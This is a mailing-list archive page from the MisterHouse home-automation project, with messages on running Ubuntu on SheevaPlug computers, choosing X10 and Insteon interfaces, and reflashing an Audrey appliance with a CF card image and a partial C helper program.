It supports computer access control and tracking. XyLoc's full-time access control technology addresses the major vulnerability inherent in all existing security methods - they are gatekeepers that protect the information only at the point of entry: the initial logon process. Other security solutions are not "smart" enough to recognize that users are not in control of their computers at all times after logon After users have entered their password, inserted their token or placed their finger on the reader and they have been identified and authenticated, the gate is wide open and information assets are up for grabs the minute the user walks away from the PC.
XyLoc's operation is easy, transparent and automatic. XyLoc consists of a lock that is an ultra low-power wireless transceiver that attaches to the PC's serial, keyboard or USB (Universal Serial Bus) port. The XyLoc key is a battery-operated ultra low-power transceiver with a unique, encrypted user identification code that is worn or carried by an authorized user. The XyLoc lock and key are in constant, encrypted two-way wireless communication with each other, with the lock scanning for the presence or absence of authorized users. As the user approaches the PC, XyLoc identifies and authenticates the user, and unlocks the PC as appropriate. Then, if the user moves out of the active zone, XyLoc will automatically blank the screen, lock the keyboard and disable the mouse. The PC is instantly secured and remains so until an authorized user moves back inside the active zone. However, background tasks, such as printing and downloading, may continue while the PC is locked.
-Pat
Re:Didn't Xerox PARC do this first? (Score:1)
Re:Didn't Xerox PARC do this first? (Score:1)
Re:Can you turn it off? (Score:1)
As I recall, the badges were built from bits of TV remote. My favourite touch was the way they dealt with the collision of signals when multiple people were in the room -- instead of a random-wait-before-retry approach (ala Ethernet), each badge sent its hellos in the same interval, but using cheap (as in beer) parts that had significant variations in internal clock. Given a few minutes, the drift would eventually open a window.
I think the other part of it was that the interval was also proportional to the amount of light falling on a sensor, so yes, putting it in a drawer effectively turned it off (of course, it couldn't get an IR signal out through an opaque drawer anyway...)
The hard part is cultural, of course, so that people see it as a useful tool rather than a spy for an oppressive management. The environment they described sounded pretty techno-idylic -- I'd have strong doubts about this kind of system in a factory or even most offices.
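A quick numeric sketch of the drift trick described above (all numbers invented): two transmitters that start in collision but run on slightly unequal clocks will eventually stop overlapping.

```python
# Two badges transmit every `period` seconds; cheap parts mean the periods
# differ slightly. Find the first beacon where their pulses stop overlapping.
pulse = 0.005                        # 5 ms transmission (invented)
period_a, period_b = 1.000, 1.003    # ~0.3% clock drift (invented)

n = 0
while True:
    n += 1
    t_a, t_b = n * period_a, n * period_b
    if abs(t_a - t_b) > pulse:       # pulses no longer overlap
        break
print(n, abs(t_a - t_b))             # the window opens after only a few beacons
```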
Nerf wars will never be the same (Score:1)
Sounds like a legitimate business expense to me..
I can hear it now... (Score:1)
"ROGERS! Get the hell off the can! You've been in there for an *hour and a half*!"
--nick
Re:This is ANTI-Big brother.... (Score:1)
I figure as long as you aren't required to use it. There would be times in the day when I don't want anyone to follow me around as I'm pacing the halls tearing hair out because of a project that just isn't working. In which case, I leave the bat in my office and put a message or something on it "Storming around in anger, Please Do Not Disturb". Problem solved.
Does This Mean (Score:1)
"Me Ted"
So now we have bigger and better surveilance (Score:1)
Ideas are always great in themselves, it's only how we use them.
Cool, but... (Score:2)
Re:Cool, but... (Score:2)
Oh crap....that stupid bat must have fallen out of my pocket onto the floor of my office. Again.
Even better, hook it up to an RC car and race it through the halls. Your boss will think you really wanna get things done.
Stupid Monitoring Tricks (Score:2)
To a large extent cellphones with text-messaging & email gateways have replaced much of the functioniality (it's easier to reach us at our designated phone then have a nearby one ring for us plus we can accept/decline the call based on who it is and recieve simple text-messages.)
Corporate directory services & biometric logins have replaced another large part of the functioniality. It's not much more of a bother to stick one's thumb in the reader then to walk into the office & since the system was sometimes overzealous (I just walked in to talk, not to log out some poor coder halfway through a thought simply 'cause I was Sr.) this feature was soon turned off.
What's left is more of the Big-Brother people-tracking features that weren't so appreciated.
Frankly while I think it's a neat technology much of it will probably appear in a less-automated way. We'll be able to adjust common things using our phones / palmstops / whatever using a virtual dimmer / volume control / etc. and come up with a room consensus, or at least local variations. Secured doors will unlock automagically as we push against them instead of requiring an explicit keycard swipe.
But tracking, thanks, been there / done that / not interested.
Re:Olivetti on Discovery years ago (Score:2)
Phone transfers nothing new... (Score:2)
Olivetti on Discovery years ago (Score:2)
It's a pretty swell idea, you never miss phone calls. But then you can never AVOID phone calls either, which I guess would suck.
Re:AT&T Didn't give us VNC (Score:2)
what bennefit does it have over ssh + X11 forwarding? (besides running on windows)
Re:AT&T Didn't give us VNC (Score:2)
Re:Sun Microsystems has a similar system (Score:2)
Just yesterday our whole group went down to a test lab as a group to try a mass testing of our app where we were all together in one room at the same time. I used VNC to let us have access to the server to view logs and fix small problems while the test was in progress, really handy.
Also, at a local Sun campus things seem to work more that way. My friends there have permanent offices (well, as permanent as any office ever is!). They also have some of the exact same hosting cubes that the original poster described for employees visiting from other buildings or states to access thier desktop.
Re:Sun Microsystems has a similar system (Score:2)
I don't get the motivation behind hot-desking - it seems a really good way of demoralising your entire workforce for very little gain. We're naturally territorial - as are most living things. The first thing anybody ever does is to define a bit of space in the world as their own by putting up pictures, unpacking their favourite coffee cup/stuffed lizard/electric pencil sharpener. Living in hotel rooms is miserable (even if your significant other is there too) simply because it's impersonal and dehumanising. Hot-desking is, for this reason alone, a really bad idea.
Interesting you're at Sun - another thing that didn't quite work out was the diskless computer. I wonder if part of this is for the same reason - I know you get your filestore, desktop and so on, but its still not your computer with its own local drive, humming power-supply fan, and (goddam it), smell.
Do you try to book the same cuboid every day?
Seems to know which way people are facing... (Score:2)
I wonder how much of this is inspired by cheap science fiction programs - all the user interfaces in Space 1999 were made out of paper too...
Can you turn it off? (Score:2)
#include "disclaim.h"
"All the best people in life seem to like LINUX." - Steve Wozniak
Yeah... (Score:2)
This was MANY years ago - at least 10 years ago. I remember seeing it while I was in high school. Only now are the pieces really falling into place.
I just wonder why it takes so damn long for these type things to catch on (like multimedia - started in the mid-80's with the Amiga, didn't become popular until the mid-90's with the PC).
Worldcom [worldcom.com] - Generation Duh!
Bell Labs has been doing this for some time... (Score:2)
...if I recall correctly. It might be somebody else, but I distinctly remember reading an article about this many years ago.
The one I remember works like this (I can't get to the linked article, bad network today). An embedded chip in the company ID badge serves as the locator, but only functions while on campus. When sombody dials "your" number, the system finds you, finds the telephone nearest to you, and rings that 'phone.
Like I say, this isn't new, but I cannot recall whether that place was Bell Labs or somewhere else. Almost certain it was Bell Labs. And, of course, that was only the telephone system -- nothing about VNC, etc, etc.
ugh! (Score:2)
The truth is, people don't like to be tracked, at home, or at work (privacy, anyone?) We reluctantly accept the fact that we have to wear badges to work, and scan into locked doors, et cetera, but I do not want my employer to have the ability to determine my physical location every second of the workday. $megacorp does have the right to make sure that I am being productive, but that can much more easily be done by using performance metrics (you pushed 4000 papers today!) and, ideally, with the employee's direct relationship to his/her supervisor.
Furthermore, tracking users is not "sentience." this is simply determining the presence or absence of a value given a location. Granted, they took a n additional step in making someones' computer profile follow them wherever they go, but even NT can do that! (to a much lesser extent, but still roaming profiles)
Re:Can you turn it off? (Score:2)
That being said, there's another issue of PHB policies of "from 9 to 5 don't even think about turning it off" etc. I'd say I'm more concerned about that then the actual device. Sort of like Mr. Spacely following George around the office. That would be the only reason I wouldn't one. Fortunately I don't work for Mr. Spacely.
"You'll die up there son, just like I did!" - Abe Simpson
On second thought Big Brother is a good thing (Score:2)
Well to be an employer man you gotta have money.
Cuz once you got money, all the wannabes will back you up no matter what shit you pull. If you can get away with it they figure someday they will too or they'll just invest in your little racket and profit regardless whether you ever get caught or not. If people can't control their spending, fuck it gimme every dime. Why? So I can buy a couple of public libraries, build a house on a mountain, grow a forest around it and make scary noises in the middle of the night to keep the fearful away.
Then I can go back to being a normal techie interested in learning and can keep the little brethren at arms length.
C'est la vive.
Re:AT&T Didn't give us VNC (Score:2)
It has a few disadvantages too. It's flaky on windows (Can't hook into the graphics context so has to take screen snapshots) and a bandwidth hog but remember, the task is not to find the "best" way to implement a user interface to a computer but the one most suitable for the job (I've found it a godsend when debugging keyboardless kiosk applications)
Rich
Sentient, yeah, right (Score:2)
Much more powerful people tracking systems exist. The prison industry is big on this stuff. This system [abscomtrak.com] has a particularly cool animated graphic.
The real utility here is to have a system where anybody can use any computer in an office and see their environment, just like the old dumb terminal days. Somebody should put that into a Linux distro. It would give Linux something that Windows doesn't have, and given Microsoft's pricing model for software, won't have.
Re:I don't like it (Score:2)
Re:Sentient, yeah, right (Score:2)
Get over your obligation to answer the phone... (Score:2)
When I get back to someone, I just say "Hi, I'm returning your call." I don't feel the need to explain why they got my voicemail, because I am not obligated to pick up the phone whenever it rings.
I guess I am pretty lucky in the workpace. I have told our CEO when he knocked on my door that I was in the middle of a design discussion, and could I catch him in his office in a little while? I can do that because he understands I have tasks to do, and wants me to do them effectively. Others' mileage may vary.
Re:Of course the real question here is... (Score:2)
Sean
Re:Of course the real question here is... (Score:2)
Sean
BFG in the ol' briefcase (Score:2)
Sean
A few thoughts.. (Score:2)
Dark Futures? (Score:2)
1) Lan intergration into houses was a routine low maintenance item
2) The Software for the servers were well maintained, and did not require the home owner to intervene
3) The home owner would be educated to not mess with the system (think of your usual riff-raff of corporate users. Now remember that a lot of these folks own homes.
4) The default failure mode for these system is not life threatening, but allows basic manual operation of things like heat, etc.
5) the home owner is sold on the idea that he never messes with the system.
6) The homes in a neighborhood and across the town and state, etc are integrated into a flawless system not subject to weather conditions, earthquakes, and other natural disaters.
7) Political parties would have to cooperate like factions of a mafia family, without greed, to make sure that the system is maintained in perfect harmony.
8) Commercial interests who want their fingers in the pie are kept in line
9) ETC.
Sounds easy to me
General pager/cell-phone rant (Score:2)
Seems like whenever there's an article that has something to with pagers or cell-phones, someone says something to the effect of "I don't carry any of these things because it's an intrusion of my privacy, and besides, I like interacting with people the old-fashioned way." Often, it's said in a holier-than-thou way that I find really annoying.
Now, I'm not accusing you (JJ) of saying this; the way I read your post, you were just stating your own opinion, which is quite fair enough. And you did add a bit about how you interact with your co-workers, which is positive for this discussion.
But all too often, people say things which basically boil down to "I don't like pagers and cell-phones!", which is not particularly insightful or illuminating. Giving a personal opinion is all well and good, but this opinion has already been said by zillions of people zillions of times, on Slashdot and in countless other forums. Why not try and add something more original to the discussion?
(After all, if you don't want to be disturbed, you can turn it off.)
Sorry for the slight rant.
(For the record, I don't carry a pager or a cell-phone, but I have nothing against them.)
--
Re:AT&T Didn't give us VNC (Score:2)
Besides, the Windows deal, X forwarding doesn't let you take control of a program session that's in the middle of being worked on. As such, the project mentioned here (namely, having your desktop follow you around from machine to machine automatically), Just Wouldn't Work with X forwarding.
Re:AT&T Didn't give us VNC (Score:2)
That still doesn't address the issue of your current desktop. My desktop is defined by both the programs that start up when I login, as well as the programs that I currently have up and running. Starting up a remote WM addresses the former, but it doesn't magicially transfer programs that're in the middle of running. If I were in the middle of reading Slashdot on one desktop, even if my desktop contained a thing to auto-start Netscape, I'd still have to manually renavigate to where I was on the site. (Score:2)
Overall - Pretty scary idea, how would you like the %time spent in the bathroom appearing on your performance review, or within 5ft of the printer, or 5ft within the coffee pot.
Does anyone have to say "Big Brother"?
I have this now (Score:2)
Re:I don't like it (Score:2)
No one intends to be "Overly Paranoid"
Re:Of course the real question here is... (Score:2)
This is why I don't own a cellphone (Score:2)
Of course the real question here is... (Score:2)
"Where's Jones?" my boss says as he walks down the hallway.
"Oh, I saw him in the cube farm. Look's like he's working on the 3d building graphics project."
Of course, the boss would never know that what I was really doing was waiting for him around the corner with the rocket launcher and a good ol' boom-stick as backup.
Uhmm... sentient? (Score:2)
While well programmed, this lab isn't sentient or even intelligent...
Re:ugh! (Score:2)
See, I'd qualify that. People don't like being tracked if it dosn't benefit them. Try to pass a law requiring GPS locators in cell phones and you'll have a war on your hands. Make nice nice and say it's really a measure that can allow you to be located if you've been in a car accident or some other dangerous altercation and no one (except us paranoid geeks) will even blink at it.
The fundamental difference is that you and I (and the majority of the Slashdot community) live in an environment where, for some reason or another, paranoia is rewarded, either by our peers or our employers (indirectly). Neal Stephenson does a good job with that concept in Cryptonomicon.
In the end though, we don't make up a substantial part of a voting block. So if "They" decide to really press this technology, there's little short of massed civil disobediance we can really do about it. On a corporate level it's a different story. Leave your "bat" in your cube. Clip your chip laiden ID to your coat and forget to take that with you to the bathroom. If even being in the system bothers you, just don't work there. This kind of thing has to be expensive as hell, not every corp can afford it.
Back to the basic point though. People like being tracked and monitored if they feel like they get something out of it. Why are websites that remember our personal information so successfull? Sure, it's a lesser manifestation of corporate tracking, but we --like-- that sort of personalization. The illusion that the computer remembers who we are and what we like and "cares" enough to make it that way (pretend you're a luser for a sec here ok?) makes the luser feel distinctive. It's a gimic, and it apeals to something deep within our psyche. It is, quite frankly, bunk... but it appeals to us anyhow.
Just be carefull before you say "the people won't stand for this" or "people don't like this" argument. In my experiance capitalism is a really good way for dealing with products no one likes. They don't sell and they die. If people really have as big a problem as you say with this the corporations that use it will flounder and die. The system will die with them and we'll all go home happy.
Ok... I'll shut up now.
This has been another useless post from....
Re:Sun Microsystems has a similar system (Score:2)
I wonder if part of this is for the same reason - I know you get your filestore, desktop and so on, but its still not your computer with its own local drive, humming power-supply fan, and (goddam it), smell.
Well, I have my own development server locked in a room somewhere. I can't hear or smell it, but it's still mine.
Do you try to book the same cuboid every day?
You can only reserve them for five days at a time so I mostly stay in once place all week. But I often don't get the same room. And some rooms are better than others. I can look down a long hallway at the moment, 45 degrees to me left. It's an annoying visual distraction. There's good sound-proofing though. The reservation system also has a few bugs so sometimes, there are collisions. I got bumped a couple weeks ago by another person while I was at lunch. We both had valid reservations. The most annoying thing, though, is that I can't keep my reference books handy. They have lockers (just like high school, no kidding) but that's annoying. And I also can't keep my small lego collection handy.
Not my Cup o' Tea (Score:3)
No slacking! (Score:3)
Also, I like the Sims-esque 3D image. I bet it's a farking blast to watch your coworkers on this thing in realtime.
Cool, so can I? (Score:4)
2) walk into a bathroom stall
3) use the terminal on the back of the door to start playing my newly downloaded song(s)
4) answer the phone there when the RIAA calls?
Big Brother vs. Enabling Technologies (Score:4)
I think this is a really interesting evolution of the smart-card identifier for terminals, creating a mobile desktop. This starts causing the environment to react to the specific presence of the user. From the JavaOne JavaRing demo of knowing what your coffee preference was, up to this system with speaker-specific transcription services, we may finally get to a technological workplace that enables us rather than causes us to conform to yet another interface.
And as the point to ponder, we are going to need to look at the intent more carefully in legislation. Is is now possible to profile people so completely via spending patterns, location, communication tendencies, etc. that unscrupulous corporation could manipulate trends in people reasonably easily. The laws need to adapt to prevent this misuse, and yet enable honest companies and people to provide legitimate, privacy-ensured services to people that want them without fear of this manipulation.
I'm not a lawyer, but that's how the laws started, was to uphold the moral views of the majority. It appears to me that we will need to return there soon, or we will be forced to forego these types of enabling technologies as are shown by AT&T and these other companies.
You wanna rant, do it offline.
You wanna think, do it here.
Re:AT&T Didn't give us VNC (Score:5)
The Olivetti and Oracle Research Labs were acquired by in January 1998 by AT&T Research to form AT&T Labs Cambridge. The same guys work there, doing the same research, under a different banner.
Perhaps moderators need a "This guy is well-meaning but misinformed" option, which demotes the comment, but doesnt detract from the guy's karma? Hmm...
Sun Microsystems has a similar system (Score:5) | http://news.slashdot.org/story/01/03/09/155233/sentient-computing-lab | CC-MAIN-2015-32 | refinedweb | 5,782 | 71.34 |
Welcome to the introduction to Kivy tutorial. First off, what is Kivy? Kivy is a multi-platform application development kit, using Python.
This means Kivy runs on iOS, Android, macOS, Windows, and Linux! That's quite a list! What's more, not only does it run across all of these platforms, but you can also take advantage of multi-touch, which is common on mobile devices.
With Kivy, you can also access mobile APIs, like the Android API, to manipulate things like a phone's camera, gyro sensor, GPS, vibration motor, and so on.
I assume you already have Python. If you're new to Python, you should probably learn the basics of Python first.
Convinced? Great, let's get Kivy!
In order to use Kivy, you're going to also need PyGame, and likely Cython down the road, though we'll leave that out for now.
Since PyGame is a dependency of Kivy, we'll grab that first. PyGame is one of the original packages for creating games in Python. There is a PyGame tutorial series here on this website as well, if you are particularly interested in game development.
In order to get PyGame, and then Kivy, we're going to use pip. So long as you have a recent version of either Python 2 or Python 3, you already have pip on your system. This tutorial is done with Python 3, though you should be able to follow along with Python 2.
Open bash or cmd.exe, and do:
pip install pygame
pip install kivy
That should be it. Are you having trouble with pip? I have a more in-depth tutorial on how to use pip and how to handle things like 64-bit requirements and cases where pip is not in your PATH:
If you need help with pip, check out the pip tutorial.
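If you want to confirm that both packages actually landed in your environment, a quick sanity check like the following can help. (This is just a sketch: it only checks that the packages are importable, not that Kivy will actually run on your graphics setup.)

```python
import importlib.util

# Report whether each required package can be imported.
# find_spec() returns None when a top-level package is not installed,
# without actually importing (and running) the package.
for pkg in ("pygame", "kivy"):
    found = importlib.util.find_spec(pkg) is not None
    print(pkg, "is installed" if found else "is MISSING")
```

If either line reports MISSING, re-run the pip commands above and watch for error messages.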
Once you have Kivy installed successfully, you're ready to begin your first basic program!
Kivy handles a lot of the back-end requirements for you. For things like where the mouse is, how a button should react when clicked, or, even how to manage multiple screens, Kivy has your back!
import kivy
kivy.require("1.8.0")
from kivy.app import App
from kivy.uix.label import Label
First we import kivy itself and require a minimum Kivy version, then we import the App class. The require() call isn't mandatory, but it's a good idea if you're relying on newer Kivy features. Finally, we pull Label from Kivy's uix package.
class SimpleKivy(App):
    def build(self):
        return Label(text="Hello World!")
Now we create our main application, called SimpleKivy, inheriting from Kivy's App class. The build method is the one Kivy expects: it runs when the application starts and returns the root widget. Here, we're just returning a simple Label that displays "Hello World!"
Confused by "class" or Object Oriented Programming? OOP makes the most sense in most cases when creating things like interactive GUIs (graphical user interfaces) or Games. OOP can be a bit confusing, though it doesn't have to be! If you're confused about OOP, check out the Object Oriented Programming Crash Course.
if __name__ == "__main__":
    SimpleKivy().run()
Now we run the code. What does this if __name__ == "__main__" check mean? It tests whether the file is being executed directly (rather than imported by another module), and only in that case starts the app.
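As a standalone illustration (the file name demo.py is hypothetical and not part of the Kivy app), the idiom works like this:

```python
# demo.py -- a minimal illustration of the __name__ idiom.

def main():
    return "app started"

if __name__ == "__main__":
    # This branch runs only when the file is executed directly
    # (e.g. "python demo.py"), not when it is imported.
    print(main())
```

If another script did import demo, then inside demo.py __name__ would be "demo" and nothing would auto-run; executed directly, __name__ is "__main__" and main() is called.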
That's all there is to it. When you run the application, you should get a window displaying "Hello World!"
One of the things that makes Kivy a superb module is the documentation. Kivy offers documentation on their website which is very well done, but Kivy also has extensive commenting within the actual Python module itself. It might be the most documentation that I've ever seen. If you want to know, for example, what you can do with this "Label," why not check it out in the module? To do this, do you know where to look?
Third-party modules are *usually* stored in the /Lib/site-packages/ directory of your Python installation. If you're having trouble finding it, however, you can usually locate a module by doing something like:
import kivy
print(kivy.__file__)
That will give you the location of a module, which, for me, is:
C:\Python34\lib\site-packages\kivy\__init__.py
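The same trick works for any installed module. If you'd rather not import a module just to find it, the standard library's importlib can look up the path without running the package's import-time code (demonstrated here on the standard library's json module so the snippet runs anywhere):

```python
import importlib.util

# Locate a module's file on disk without importing it.
spec = importlib.util.find_spec("json")
print(spec.origin)  # e.g. .../lib/python3.x/json/__init__.py
```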
That's at least where the __init__.py is, but we're mostly interested in looking in the Kivy directory. Let's head there!
We see that we imported the "Label" from kivy.uix.label, so we can assume we'll find Label within kivy/uix/label.py.
Sure enough, there it is. Open it up, and just look at all those options...and all that commenting! Far more commenting than code. So, if you're interested in learning more about Kivy and its features, just browse your installation, or poke around in their documentation!
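As a side note, you don't even have to open the source files to read these docstrings. The standard library's pydoc module renders the same text that the interactive help() function shows. (The example below uses the built-in dict so it stays self-contained; once Kivy is installed, the same call works on kivy.uix.label.Label.)

```python
import pydoc

# Render an object's docstrings as plain text, the same way the
# interactive help() function does. Works on any importable object.
text = pydoc.render_doc(dict, renderer=pydoc.plaintext)
print(text.splitlines()[0])
```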
For us, we're now ready to move on! | https://pythonprogramming.net/kivy-application-development-tutorial/ | CC-MAIN-2018-05 | refinedweb | 795 | 76.22 |
Console not updating anymore for debugging
On 29/04/2015 at 08:02, xxxxxxxx wrote:
Hi
This is an odd one.
Until just recently I would use the console to display data while executing a python generator script. I would have some loops with intensive cpu work going on - and I would update the console with some print commands to show where in the loop it is, and print other useful data. This would show me in realtime how the script is progressing as it's being executed.
But for some reason this has suddenly stopped. I now only get the print out of data in one lump sum after the script has completed, and not during execution. I can't remember changing any settings, or changing anything in my code that would cause it. Totally dumbfounded. Any help appreciated, thanks,
Glenn.
On 29/04/2015 at 08:24, xxxxxxxx wrote:
Hi Glenn,
just a wild guess...
Did you try to open a new scene with a new generator object and copy/paste the code.
A few days ago I had some issues with a generator, too and a new scene solved it.
Best wishes
Martin
On 29/04/2015 at 08:57, xxxxxxxx wrote:
Na, just tried that Martin - copied everything into a new scene file, created new generator.. no luck. strange one..
On 29/04/2015 at 11:10, xxxxxxxx wrote:
where is your print statement placed?
Is it after you return the cache? Did you handle the cache optimization by yourself?
A snippet will help to dive into.
Best wishes
Martin
On 29/04/2015 at 11:38, xxxxxxxx wrote:
just found the source of the problem - it's to do with the EventAdd lines I have in my code. Below I've recreated the problem - 'hit' is printed after the code has completely executed. Take out the eventadd line and it's printed half way through as expected.
import c4d
#Welcome to the world of Python
c = 0
for x in xrange(1000000) :
cube = c4d.BaseObject(c4d.Ocube)
if c==50000: print 'hit'
c += 1
c4d.EventAdd()
print 'done'
def main() :
return
On 30/04/2015 at 07:42, xxxxxxxx wrote:
Hello,
calling EventAdd() inside the loop does not make sense. This function adds an event to an event queue that is evaluated after your code is left. Also adding multiple events will result in only one update.
If the presence of EventAdd() influences the work of "print" it might be a bug. We will investigate.
Best wishes,
Sebastian
On 30/04/2015 at 08:36, xxxxxxxx wrote:
Thanks,
In my actual program (not the example above) the eventadd wasn't inside the loop - it was in the root level of the script after the loop had finished, but was still causing the problem. I needed the eventadd to update my scene after materials where added to objects. Anyway, I got around all this and things are working okay without eventadd anywhere, cheers. | https://plugincafe.maxon.net/topic/8674/11362_console-not-updating-anymore-for-debugging | CC-MAIN-2020-16 | refinedweb | 497 | 72.16 |
You may have heard that Podman V2 has a new RESTful API. This document demonstrates the API using code examples in Python and shell commands. Additional notes are included in the code comments. The provided code was written to be clear vs. production quality.
Requirements
- You have Python >3.4 installed.
- You have installed the Python requests library.
- An IDE for editing Python is recommended.
- Two terminal windows: one for running the Podman service and reviewing debugging information, the second window to run scripts.
- Usage of curl and jq commands are demonstrated.
- You can review connection URLs here.
Getting started
The service
For these examples, we are running the Podman service as a normal user and on an unsecured TCP/IP port number.
For production, the Podman service should use systemd's socket activation protocol. This allows Podman to support clients without additional daemons and secure the access endpoint.
The following command runs the Podman service on port 8080 without timing out. You will need to type ^C into this terminal window when you are finished with the tutorial.
# podman system service tcp:localhost:8080 --log-level=debug --time=0
In addition to the TCP socket demonstrated above, the Podman service supports running under systemd's socket activation protocol and Unix domain sockets (UDS).
[ You might also like: Sneak peek: Podman's new REST API ]
Python code
Info resource
The following shows us information about the Podman service and host:
import json import requests response = requests.get("")
Deep dive
requests.get()calls the requests library to pass the URL to the Podman service using the GET HTTP method.
- The requests library provides helper methods for all the popular HTTP methods. the Podman service invocation above.
/v1.40.0denotes the API version we are using.
/libpoddenotes that we expect the service to provide a
libpod-specific return payload.
- Not using this element causes the server to return a compatible payload.
/infospecifies the resource we are querying.
Interesting to read, but without output, how do we know it worked?
Getting output
Append the lines below, and you can now see the version of Podman running on the host:
response.raise_for_status() info = json.loads(response.text) print(info.version.Version)
raise_for_status()raises an exception if status code is not between 200 and 399.
json.loads()decodes the body of the HTTP response into an object/dictionary.
When executed, the output is:
2.1.0-dev
The following works from the shell:
$ curl -s '' | jq .version.Version "2.1.0-dev"
Listing containers
import json import requests response = requests.get("") response.raise_for_status() ctnrs = json.loads(response.text) for c in ctnrs: print(c.Id)
json.loads() decodes the HTTP body into an array of objects/dictionaries, the program then prints each container Id. For example:
$ curl -s '' | jq .[].Id "81af11ef7188a826cb5883330525e44afea3ae82634980d68e4e9eefc98d6f61"
If the query parameter all=true had not been provided, then only the running containers would have been listed. The resource queries and parameters for the API are documented here.
Something useful
We've looked at a couple of examples, but how about something a little more useful? You have finished developing the next great container, and the script below will remove everything from your local storage. (If you want to save on typing clean_storage.py)
#!/usr/bin/env python import json import requests # Clean up local storage by removing all containers, pods, and images. Any error will # abort the process confirm = input("Really delete all items from storage? [y/N] ") if str(confirm).lower().strip() != 'y': exit(0) # Query for all pods in storage response = requests.get("") response.raise_for_status() pods = json.loads(response.text) # Workaround for if pods is not None: for p in pods: # For each container: delete container and associated volumes response = requests.delete(f"{p['Id']}?force=true") response.raise_for_status() print(f"Removed {len(pods)} pods and associated objects") else: print(f"Removed 0 pods and associated objects") # Query for all containers in storage response = requests.get("") response.raise_for_status() ctnrs = json.loads(response.text) for c in ctnrs: # For each container: delete container and associated volumes print(c.keys()) response = requests.delete(f"{c['Id']}?force=true&v=true") response.raise_for_status() print(f"Removed {len(ctnrs)} containers and associated objects") # Query for all images in storage response = requests.get("") response.raise_for_status() imgs = json.loads(response.text) for i in imgs: # For each image: delete image and any associated containers response = requests.delete(f"{i['Id']}?force=true") response.raise_for_status() print(f"Removed {len(imgs)} images and associated objects")
[ Getting started with containers? Check out this free course. Deploying containerized applications: A technical overview. ]
Summary
I hope you find this helpful. The API documentation provides you with all the resources and required methods. The input and output bodies are included as well as the status codes.
The Podman code is under heavy development and we welcome your input with issues and pull requests on the project's GitHub page. | https://www.redhat.com/sysadmin/podman-python-bash | CC-MAIN-2020-45 | refinedweb | 818 | 51.34 |
You can subscribe to this list here.
Showing
3
results of 3
On 07/05/2011 05:52 PM, peter wrote:
> # It appears Ubuntu is what is being used- at least by some. I se a 9.x
> version is available. Is this the version in use by MH users?
This is the version I'm using on my Sheevas, though I am looking towards
using Debian when I get a chance to figure out how to load it.
> # Assuming LTS versions are only ones to consider, what are the
> ramifications of the fact that Ubuntu is now on 10.x? To put it another
> way, does it create problems to stay 'current' on the plug platform?
The reason 9.x is being used is that there was a change to Ubuntu(?)
and the specific ARM setup is not being used, hence no 10.x for the
Sheeva.
> # Once I transition to plug computer, I would prefer to power computer
> using a scheme that avoids a traditional UPS. I would use use a config
> that looks something like this: Battery charger > Battery >HE DC/DC
> converter(s) > devices that still need to work when power fails. Is
> selecting a dreamplug or D2plug going to make things more complicated
> with regard to the OS? I also see advantage (possibly / till I need
> more channels) of having on board audio. I am also assuming that if no
> drivers are loaded for the display hardware, that that part of the
> chipset will have little or no impact on the power budget - just my
> wallet correct?
This part is very confusing. I suggest you reword it. But I think you are
asking if loading software will increase power usage and the answer is yes.
Also the more devices you hook up the more power is uses.
> # Related question, I see Sheeva has PS available separately
> (replacement I guess). Can the basic Sheeva be supplied with DC easily?
It looks like the DreamPlug has an external power supply so you just
need to match the power requirements. Building power with backup is
just a matter of getting the correct circuits built.
--
Linux Home Automation Neil Cherry ncherry@... Main site My HA Blog
Author of: Linux Smart Homes For Dummies
On Tue, Jul 05, 2011 at 02:37:03AM -0400, peter wrote:
> What should I be using for SVN version that will be fairly stable and
> that dosen't break any of the hardware I plan to use?
> Should I ditch the CM11a and get a 2413U or 2412N now? My CM11a has
> been a bit finicky so I dont want to spend much time on it if I have
> another viable option
A 2413 S or U should do anything a CM11 can do and much more.
Note that the 2412 isn't being sold by smarthome anymore, but the 2413
should work fine.
I would avoid the 2412N, reda the comments:
Also, I do not believe the 2412N works with mh currently.
> Should I be installing MH in /opt/mh or another spot?
Up to you.
I use /var/local/src/misterhouse/mh and have mh be a symlink to the tree I
want to use (mh, mh-insteon, etc...).
> In the short term I need:
> # To be able to control a handful of X-10 devices already on hand and
> installed.
> # Ability to monitor and control via web. This is kind of a given and
> dosen't seem to be an issue ATM.
mh will do this fine. There is a caveat with insteon though, insteon
commmands aren't fire and forget, you have to wait for the ack.
The mh web interface does not deal with that and therefore shows the old
state of the device because the ACK hasn't been received yet (refresh fixes
this).
> # To utilize 1-wire for temp, humidity (have humichrons - hope they are
> supported by now), and possibly some slow I/O - initially to control
I use 1-wire as you know I do not have humichrons, so I can't comment on
them.
Marc
--
"A mouse is a device used to point at the xterm you want to type in" - A.S.R.
Microsoft is to operating systems ....
.... what McDonalds is to gourmet cooking
Since I'm seeing lots of messages about a new release coming out, I thought
I might add my two cents to the wiki, and help out some other unfortunate
soul who tries to get Audrey working with MisterHouse. I know that Audrey
is obsolete, but someone, somewhere has one and I don't want them to have go
thru the same trouble I had setting it up. All the info in this walkthru is
available with a quite bit of searching on google and waybackmachine.org
If you want your Audrey to be useful (as more than a doorstop), you will
have to update its software. This can be done using a CF card, There are
several images available (but they are growing scarce) I recommend MrAudrey
03-3. It is currently available at:
* wget
*
This is NOT a ZIP file !!! This is the actual flash image DO NOT TRY TO
UNZIP
Once you have the image you will need mkcf.c see below for code.
Here are my notes on making a CF for loading a new image, these are based on
a 32MB Sandisk CF, but any can be used if you give mkcf the correct CF
geometry:
*mkcf MrAudrey_03-3.zip new.cf 32112640*
* dd if=new.cf of=/dev/CF count=62720*.
Once you have the firmware updated, configuring MisterHouse to use Audrey is
actually quite trivial. The first step is to edit your mh.private.ini and
add in the Audrey info.
* Audrey_IPs=Kitchen-10.0.1.13*
* Audrey_no_reboot_on_startup=1*
* sound_dir=/opt/misterhouse/sounds*
* sound_dir_common=$Pgm_Root/sounds*
Then go into Common Code Activation under Setup from web interface, from
there enable: audrey_control2.pl and audreyspeak.pl and click "Process
selected files" You should now have a blinkie/talkie Audrey.
Audrey can be quite flaky. Sometimes it unsuspends by itself, sometimes it
won't unsuspend at all, sometimes the web browser hangs, etc. There is no
hardware reset button so make sure you can get to the power cord.
BEGIN mkcf.c
Do whatever you want with this source code. I don't care.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_COMPACT_FLASH_FILE_SIZE (62592 * 512)
#define AUDREY_FLASH_SIZE (16 * 1024 * 1024)
#define IMAGE_SIZE_OFFSET (0x1e8fe00)
#define IMAGE_SIGNATURE 'KOJA'
#define IMAGE_TRAILER_SIZE (0x10)
#define IMAGE_FINAL_FILLER_SIZE (0x1f0)
